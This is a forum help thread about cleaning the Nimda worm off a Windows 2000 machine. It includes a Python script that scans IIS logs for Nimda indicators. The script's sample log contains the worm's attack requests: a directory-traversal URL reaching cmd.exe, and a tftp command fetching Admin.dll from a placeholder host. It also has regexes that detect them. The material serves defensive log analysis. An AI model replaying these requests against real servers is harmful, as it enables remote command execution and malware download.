
Nimda Removal Probs

AntBon asked (Medium Priority, 281 Views, Last Modified: 2010-04-13)
Hi

I have a Win2K Pro (with IIS installed as a separate component, it is not standard with Win2K Pro !) SP2 machine with IE6.0 and Outlook Express 6.0. My virus checker is F-Secure 5.30 (with the very latest virus signatures). I have run the F-Secure and completely cleaned my machine as it WAS infected, but F-Secure now tells me it is clean !

I have downloaded the Microsoft patches from the Microsoft web pages, when I go to install the patches a messagebox tells me that the version of the software/Operating system don't require the patches (this is also confirmed in the Microsoft literature).

MY PROBLEM is that when I surf the net and go to my usual pages (just football forums), the virus checker often tells me that 'Nimda' has been found in C:\Inetpub\Scripts\TFTP656 etc....

How can this be, if I have the latest patches and the F-Secure is updated as well?

What have i missed out !!

Commented:
If you take a look at the IIS log files under \WINNT\System32\Logfiles\W3SVC ... you can get an idea about what had been done.

In short, this type of intrusion utilizes a well known relative path buffer overflow vulnerability to gain access to CMD.EXE ! (Who the hell is maintaining the code in Microsoft !!!)

Then, this particular worm uses tftp to download a file called Admin.dll and leave it under your C:\ D:\ waiting for activation ......

You can imagine if this worm can do more things than TFTP, such as running a flight simulator and ...

So, if you have found Admin.dll in your root directory, that's the signature and evidence !

I don't know how M$ is going to say about this but I'm going for the Apache on Linux from now on.

God bless you.
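The comment above suggests reading the IIS log files under \WINNT\System32\Logfiles\W3SVC to see what the worm did. The script below is an added example, not code from the commenter or from any vendor tool: it parses the W3C extended log format that IIS writes (using the `#Fields:` directive to name the columns) and flags requests carrying the indicators the thread describes, namely cmd.exe reached through a relative-path (`..`) sequence, tftp being invoked, and Admin.dll being referenced. The sample log text is constructed for the example (the client addresses are documentation ranges), and the indicator list is an assumption based on the thread's description rather than a complete signature set.

```python
import re
from urllib.parse import unquote

# Constructed sample of an IIS 5.0 W3C extended log; not taken from anyone's real server.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-09-18 13:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 13:00:01 192.0.2.10 GET /default.htm - 200
2001-09-18 13:00:02 198.51.100.7 GET /scripts/root.exe /c+dir 404
2001-09-18 13:00:03 198.51.100.7 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:00:04 198.51.100.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+tftp%20-i%20198.51.100.7%20GET%20Admin.dll%20c:\Admin.dll 200
2001-09-18 13:00:05 192.0.2.11 GET /images/logo.gif - 200
"""

# Indicators drawn from the thread's description (assumed list, not a full signature set).
# Each regex is applied to the URL-decoded, lower-cased request (stem plus query).
INDICATORS = [
    ("cmd.exe requested via web server", re.compile(r"cmd\.exe")),
    ("root.exe (renamed cmd.exe) requested", re.compile(r"root\.exe")),
    ("directory traversal sequence", re.compile(r"\.\.[/\\]")),
    ("tftp invoked from request", re.compile(r"\btftp\b")),
    ("admin.dll referenced", re.compile(r"admin\.dll")),
]


def parse_w3c_log(text):
    """Yield (line_number, record_dict) for each data line of a W3C extended log.

    Column names come from the most recent '#Fields:' directive; other '#'
    lines are directives and are skipped. Values never contain spaces in this
    format (spaces are written as '+'), so whitespace splitting is safe.
    """
    fields = None
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError(f"line {lineno}: data before any #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            raise ValueError(f"line {lineno}: expected {len(fields)} columns, got {len(values)}")
        yield lineno, dict(zip(fields, values))


def decode_request(stem, query):
    """Normalise a request for matching: '+' to space, decode twice so that
    double-encoded traversal (e.g. %252f) is also exposed, then lower-case."""
    raw = (stem + " " + query).replace("+", " ")
    return unquote(unquote(raw)).lower()


def scan_iis_log(text):
    """Return a list of findings, one per request that matches any indicator.

    'served' is True when the status code is 2xx, i.e. the server actually
    handled the request rather than rejecting it; that distinguishes a probe
    that bounced off a patched server from one that got through.
    """
    findings = []
    for lineno, rec in parse_w3c_log(text):
        decoded = decode_request(rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", ""))
        hits = [name for name, rx in INDICATORS if rx.search(decoded)]
        if hits:
            findings.append({
                "line": lineno,
                "client": rec.get("c-ip", "?"),
                "status": rec.get("sc-status", "?"),
                "served": rec.get("sc-status", "").startswith("2"),
                "indicators": hits,
            })
    return findings


def summarize_by_client(findings):
    """Count flagged requests per client address, to see who was probing."""
    counts = {}
    for f in findings:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_iis_log(SAMPLE_LOG)
    for f in results:
        state = "SERVED" if f["served"] else "rejected"
        print(f"line {f['line']:>4}  {f['client']:<15} {f['status']} {state}: {', '.join(f['indicators'])}")
    print("per client:", summarize_by_client(results))
```

Run it against a real W3SVC log by replacing `SAMPLE_LOG` with the file's contents. A flagged request with a 2xx status is the one worth worrying about: a 404 on `root.exe` means the probe found nothing, while a 200 on a traversal to `cmd.exe` followed by a `tftp` command line is the sequence this thread describes, and the `c-ip` column tells you which host did it.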

Author

Commented:
I did have the Admin.dll in my root directory, and i have cleaned my machine up as per instructions provided by F-Secure, but as i say i keep getting the TFTP files appearing when i am on line and obviously they get detected by F-Secure.  Why is this still happening when i have installed the latest patches and what are the TFTP files?

Commented:
Why don't you just delete these files:

C:\Inetpub\Scripts\TFTP ...

These are what the worm had left behind.

Commented:
And, as I have said, "this particular worm uses tftp to download a file called Admin.dll and leave it under your C:\ D:\ waiting for activation ......"

I can't explain what tftp is without writing a whole chapter. Please ask Google.com .
Commented:
AntBon,

Here's a site that has a Nimda Removal Tool.  I've never heard of this company, but I ran it on a test server that happened to get infected and it seems to be clean. The server's been unplugged from the network ever since it became infected.

http://www.antivirusexpert.com/removal_tools.html

If you don't want to give your email address, just download it directly from:

http://www.centralcommand.com/ts/00D709001aet/antinimda.exe

Dennis

Commented:
In addition to the Nimda patches, did you also install the CodeRed II patches?  Both Nimda and CodeRed II are viral worms. They both create zillions of files and slow down your connection speed.  They also infect everyone in your mailbox.

Commented:
What's going on on on .....
ijf

Commented:
I had the exact same problem on my machine with win2k and IE6 etc etc. The only thing different is that I was using Norton Antivirus with the latest updates of virus definitions. After I continuously ran the checker and the results were negative, I would get messages constantly about those "TFTP" files and Admin.dll. By this time I downloaded McAfee (a registered version by the way) and that wouldn't clean it either.

Norton (symantec.com) finally posted a removal tool that worked on my computer, and I haven't been infected since.

Good Luck.

FYI - I didn't lose any information or have to replace any system files [that I know of], the removal tool works great, and I believe it is free.

Commented:
First of all, I never heard of "F-secure".  Are you networked to other computers?  If you are, the other pcs have the virus, too!  TFTP stands for Trivial File Transfer Protocol.

The Symantec tool can be found at http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.removal.tool.html

Trend Microsystems also offers FREE removal tools for the many mutations of Nimda, and its partner worm "Code Red".  You should disable your current antivirus program FIRST.  Download the Symantec patch/patches; then get a free month of PCillin from Trend and update and run it.

Be sure to quarantine your viruses, and send them to F-secure!  You might also read your documentation that F-secure supplies.  It may have specific instructions on what to do if it continues to show you a virus file.  You may have your settings on "Alert" rather than "repair", or "quarantine", or "remove".  

Re-read my instructions, and apply them before you respond.
